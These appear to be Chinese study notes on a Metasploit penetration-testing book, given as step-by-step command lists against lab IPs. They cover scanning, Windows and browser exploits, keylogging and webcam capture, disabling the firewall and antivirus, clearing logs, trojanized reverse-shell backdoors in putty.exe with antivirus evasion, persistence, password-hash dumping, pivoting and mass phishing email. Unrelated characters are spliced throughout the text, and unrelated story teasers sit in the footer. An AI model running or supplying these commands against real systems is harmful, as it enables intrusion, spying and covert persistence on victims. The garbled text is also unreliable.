25.《Metasploit滲透測試與開發(fā)實踐指南》筆記

一癣朗、安裝VM、在VM中裝XP旺罢、在VM中裝kali

二旷余、data、external扁达、tools荣暮、plugins和scripts、exploits罩驻、auxiliary穗酥、payloads

三、漏洞利用基礎(chǔ)
nmap -v -n 192.168.0.103(目標(biāo)主機IP)
nmap -T4 -A -V 192.168.0.103
msf search dcom 在Metasploit中搜相關(guān)服務(wù)的漏洞
www.1337day.com / securityfocus/exploitdb 在線查找漏洞
gcc dcom.c -o dcom 下載后編譯漏洞代碼
./dcom 運行漏洞
./dcom 6 192.168.174.129 對目標(biāo)主機IP進(jìn)行攻擊
msfconsole /: use exploit/windows/smb/msp8-067-nctapi 選擇一個漏洞攻擊
show options 查看攻擊條件
set RHOST 192.168.0.103 設(shè)置目標(biāo)主機IP地址革RHOST
exploit 攻擊惠遏!

四砾跃、Metterpreter基礎(chǔ)
help
sysinfo
screenshot
ps 顯示正在運行的進(jìn)程
migrate 1512 遷移進(jìn)程ID
getpid 驗證進(jìn)程,被攻擊主機當(dāng)前進(jìn)程
keyscan_start 啟動按鍵記錄器
keyscan_dump
keyscan_stop 停止按鍵記錄
webcam_list 查看攝像頭
webcam_snap 攝像頭拍照
getuid 被攻擊主機名字
shell
mkdir hacked
shutdown -s -t 15 -c "YOU ARE HACKED" 關(guān)閉被攻擊主機节吮,并顯示一條消息

五抽高、漏洞掃描與信息收集
whois 收集域名信息

use auxiliary/gather/search_email_collector    使用郵件收集模塊
show options
set domain
run

use auxiliary/scanner/telnet/telnet_version    使用telnet版本掃描器
show options
set RHOSTS 192.168.0.103
run

use auxiliary/scanner/rdp/ms12_020_check    RDP掃描器
set PORTS 3389
set RHOST 192.168.11.46
run

nmap 192.168.11.29
nmap 192.168.11.46 192.168.11.29
nmap -iL /root/Desktop/list.txt    掃描目標(biāo)列表
nmap -sp 192.168.11.2-60    ping掃描
nmap -PA 192.168.11.46    TCP ACK ping
nmap -pe 192.168.11.46    ICMP回顯ping
nmap -R 66.147.244.90    強制DNS反向解析
nmap -sS 192.168.0.104    TCP SYN掃描
nmap -sN 192.168.0.103    TCP空掃描
nmap -scanflags SYNURG 192.168.0.102    自定義TCP掃描
nmap -F 192.168.11.46    快速掃描
nmap -P http 192.168.11.57    基于名稱的端口掃描
nmap -r 192.168.11.46    順序端口掃描
nmap -f 192.168.11.29    報文分析(Fragment Packets)
nmap -sI 192.168.11.29 192.168.11.46    空閑僵尸掃描(Idle Zombie Scan)
nmap -spoof -mac Apple 192.168.11.29    偽造MAC地址
nmap -oN scan.txt 192.168.11.46    保存掃描結(jié)果

load nessus    檢測漏洞、錯誤配置透绩、默認(rèn)憑證
nessus_help
nessus_connect root:toor@localhost:8834 ok  連接本地主機
nessus_policy_list
nessus_new_scan -2 windowsxpSCAN 192.168.0.103  對目標(biāo)主機掃描
nessus_scan_status
nessus_report_list    檢查結(jié)果
nessus_report_hosts (report ID)    打開報告
nessus_report_host_ports 192.168.0.103 (report ID)    查看詳細(xì)信息

db_status
db_import /root/Desttop/scan.xml    導(dǎo)入Nmap報告
hosts 192.168.0.102    從msf訪問數(shù)據(jù)庫
services 192.168.0.102    檢查開放端口信息
db_import /root/Desktop/Nessus_scan.nessus    導(dǎo)入nessus報告
vulns 192.168.0.103    查看主機漏洞信息

六翘骂、客戶端漏洞利用(生成惡意鏈接讓被攻擊者打開)
use auxiliary/server/browser autopwn 對瀏覽器攻擊
show options
set LHOST 192.168.11.23 攻擊者IP
set SRVHOST 192.168.11.23 服務(wù)器本地主機地址
set SRVPORT 80 本地端口地址
run 生成惡意UPR,發(fā)送給被攻擊者
session
session -i 1 選擇meterpreter會話對攻擊目標(biāo)執(zhí)行攻擊

use windows/browser/ms10_046_shortcat_icon_dllloader  IE快捷方式圖標(biāo)漏洞攻擊
show options
set SRVHOST 192.168.0.109
set SRVPORT 80
set URIDATH 1
exploit
using URL:http://192.168.0.109:80/
session
session -i 1

use  exploit/windows/browser/ms10_022_ie_vbscript_windhlp32  IE惡意VB代碼
show options
set SRVHOST 192.168.0.105
set SRVPORT 80
set URIPATH /
exploit
session
session -i 1

七帚豪、后漏洞利用
sysinfo
getpid
run checkvm
idletime 檢查目標(biāo)主機是否運行在虛擬機上
run get_env 檢查目標(biāo)主機是否正在運行
ipconfig
route 檢查目標(biāo)主機網(wǎng)絡(luò)設(shè)置
run getcountermeasure 檢查目標(biāo)主機防火墻配置信息
run getgui 檢查目標(biāo)主機遠(yuǎn)程桌面
run getgui -e
run gettelnet
run gettelnet -e
run get_local_subnets
run hostedit
run hostedit -e 127.0.0.1 www.apple.com 添加host條目
run enum_logged_on_users
run enum_logged_on_users -c
run get_applicatioin_list
run windows/gather/forensics/enum_drives
run windows/gather/enum_ms_product_keys
run window/gather/crodentials/windows_autologin
run winenum 枚舉系統(tǒng)信息
cd /root/msf4/logs/scripts/wineum/EXPLOIT_DFE265D 20130327-2532
cat hashdump.txt
run scrapper
cd /.msf4/logs/scripts/scraper/192.168.0.104 2013032756309503
cat services.txt 轉(zhuǎn)儲其他枚舉腳本攻擊提取到的信息

八碳竟、后漏洞利用——提權(quán)
use exploit/windows/http/minishare_get_overflow 遠(yuǎn)程緩沖溢出漏洞攻擊代碼
show options
set RHOST 192.168.0.102
set RPORT 80
show targets
set TARGET 3 設(shè)置目標(biāo)系統(tǒng)類型
exploit

getuid
getsystem -h
getsystem -t 0  實現(xiàn)管理權(quán)限
ps

run post/windows/escalate/getsystem  提升權(quán)限
run post/windows/oscalate/service_permissions
use exploit/windows/brower/ms10_002_aurora  另一個漏洞攻擊msf
show options
set SRVHOST 192.168.0.109
exploit

九、后漏洞利用——清除痕跡
run getcountermeasure 查看防火墻狀態(tài)
netsh firewall show opmode
net firewall show opmode mode=disaable 禁用防火墻

upload root/Desktop/disable.vbs C:\  使用VB腳本禁用防火墻
cd C:\
disable.vbs

run killav  關(guān)閉殺毒軟件
tasklist
tasklist /svc  對進(jìn)程分類
tasklist /svc/find/I "avg"
sc queryex avgwd
sc config avgwd start=disabled  強制關(guān)閉殺毒軟件進(jìn)程
clearev  清除日志

十狸臣、后漏洞利用——后門
show payloads
cd /opt/metasploit/msf3 查看后門工具
./msfpayload -h
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 X>root/Desktop/vins.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105 R | msfencode -e x80/shikataa_nai -c 6 -t exe -x/root/Desktop/putty.exe -o /root/Desktop/viruspcotty.ext 后門程序發(fā)送給被攻擊者

show encoders  編碼器列表
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105...  后門程序免殺處理

use exploit/multi/handler  當(dāng)后門發(fā)給被攻擊者后運行此命令
set PAYLOAD windows/meterpreter/reverse_tcp  設(shè)置攻擊載荷信息
set LHOST 192.168.0.103
exploit

run metsvc -h  另一個后門程序metsvc
run metsvc -A  啟動后門程序
run metsvc -r  刪除后門程序

run persistence -h  持久性后門
run persistene -A -L c:\\ -s -x -p 445 i 10 -r 192.168.0.103  持久性后門運行
resource /root/.msf4/logs/persistence/PWNED -02526E0337...

upload /root/Desktop/nc.exe c:...  另一個持久性后門
run reg enumkey -k HKLM\\...
reg setval -k HKLM\\...
reg queryval =k HKLM\\..  netcat運行
netsh firewall add portopening ...
nc -v 192.168.0.107 445  用netcat連接被攻擊者

十一莹桅、后漏洞利用——跳板與網(wǎng)絡(luò)嗅探
ipconfig
route
run autoroute -h
run autoroute -s 10.10.10.1/24 添加一條指向目標(biāo)主機的路由
run autoroute -p 驗證是否添加成功
getsystem 提權(quán)
run hashdump 轉(zhuǎn)儲所有用戶的散列密碼

use auxiliary/scanner/portscan/tcp  掃描其他地址
show options
set rhosts 10.10.10.1/24
set ports 193,445
set threads 50
run

use exploit/windows/...  開始掃描
set rhost 10.10.10.2
set payload windows/...
exploit

use sinffer  使用嗅探器
sniffer interfaces  枚舉網(wǎng)卡
sniffer_start 1
sniffer_dump 1 hacked.pcap  轉(zhuǎn)儲抓包
wireshark hacked.pcap

run packetrecorder  另一個嗅探工具
run packetrecorder -1i  抓包保存
run packetrecorder -i 1 -l/root/Desktop

load espia  截屏插件
screengrap

十二、Metasploit漏洞攻擊代碼研究

十三烛亦、使用社會工程學(xué)工具包和Armitage
進(jìn)入SET目錄诈泼,找到set_config文件懂拾,打開set_config文件,設(shè)置Metasploit的目錄路徑铐达,將SENDMAIC設(shè)置為ON岖赋,EANIL_PROIPER設(shè)置為我們使用的軟件的名字。安裝sendmail程序瓮孙。啟動SET贾节。選1執(zhí)行后,選5進(jìn)行郵件群發(fā)送

打開終端衷畦,輸入armitage,之后根據(jù)默認(rèn)一路next
開啟掃描知牌,選擇Host|MSF scanf祈争,輸入IP
選擇Hosts|Nmap Scan|Intense Scan,輸入IP
選擇Attacks|HailMary,開始自動攻擊
攻陷后角寸,右擊被攻陷系統(tǒng)菩混,選擇Meterpreter|Interact。打開終端扁藕,輸入vncviewer,輸入得到的IP和端口沮峡,然后可看到被攻擊對象的桌面了
選擇Explore|browse Files
選擇Access|Pump Hashers|scs method.選擇View|Credentials,查看傳輸結(jié)果亿柑。
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末邢疙,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子望薄,更是在濱河造成了極大的恐慌疟游,老刑警劉巖,帶你破解...
    沈念sama閱讀 212,185評論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件痕支,死亡現(xiàn)場離奇詭異颁虐,居然都是意外死亡,警方通過查閱死者的電腦和手機卧须,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,445評論 3 385
  • 文/潘曉璐 我一進(jìn)店門另绩,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人花嘶,你說我怎么就攤上這事笋籽。” “怎么了椭员?”我有些...
    開封第一講書人閱讀 157,684評論 0 348
  • 文/不壞的土叔 我叫張陵干签,是天一觀的道長。 經(jīng)常有香客問我拆撼,道長容劳,這世上最難降的妖魔是什么喘沿? 我笑而不...
    開封第一講書人閱讀 56,564評論 1 284
  • 正文 為了忘掉前任,我火速辦了婚禮竭贩,結(jié)果婚禮上蚜印,老公的妹妹穿的比我還像新娘。我一直安慰自己留量,他們只是感情好窄赋,可當(dāng)我...
    茶點故事閱讀 65,681評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著楼熄,像睡著了一般忆绰。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上可岂,一...
    開封第一講書人閱讀 49,874評論 1 290
  • 那天错敢,我揣著相機與錄音,去河邊找鬼缕粹。 笑死稚茅,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的平斩。 我是一名探鬼主播亚享,決...
    沈念sama閱讀 39,025評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼绘面!你這毒婦竟也來了欺税?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,761評論 0 268
  • 序言:老撾萬榮一對情侶失蹤揭璃,失蹤者是張志新(化名)和其女友劉穎魄衅,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體塘辅,經(jīng)...
    沈念sama閱讀 44,217評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡晃虫,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,545評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了扣墩。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片哲银。...
    茶點故事閱讀 38,694評論 1 341
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖呻惕,靈堂內(nèi)的尸體忽然破棺而出荆责,到底是詐尸還是另有隱情,我是刑警寧澤亚脆,帶...
    沈念sama閱讀 34,351評論 4 332
  • 正文 年R本政府宣布做院,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏键耕。R本人自食惡果不足惜寺滚,卻給世界環(huán)境...
    茶點故事閱讀 39,988評論 3 315
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望屈雄。 院中可真熱鬧村视,春花似錦、人聲如沸酒奶。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,778評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽惋嚎。三九已至杠氢,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間另伍,已是汗流浹背鼻百。 一陣腳步聲響...
    開封第一講書人閱讀 32,007評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留质况,地道東北人。 一個月前我還...
    沈念sama閱讀 46,427評論 2 360
  • 正文 我出身青樓玻靡,卻偏偏與公主長得像结榄,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子囤捻,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,580評論 2 349

推薦閱讀更多精彩內(nèi)容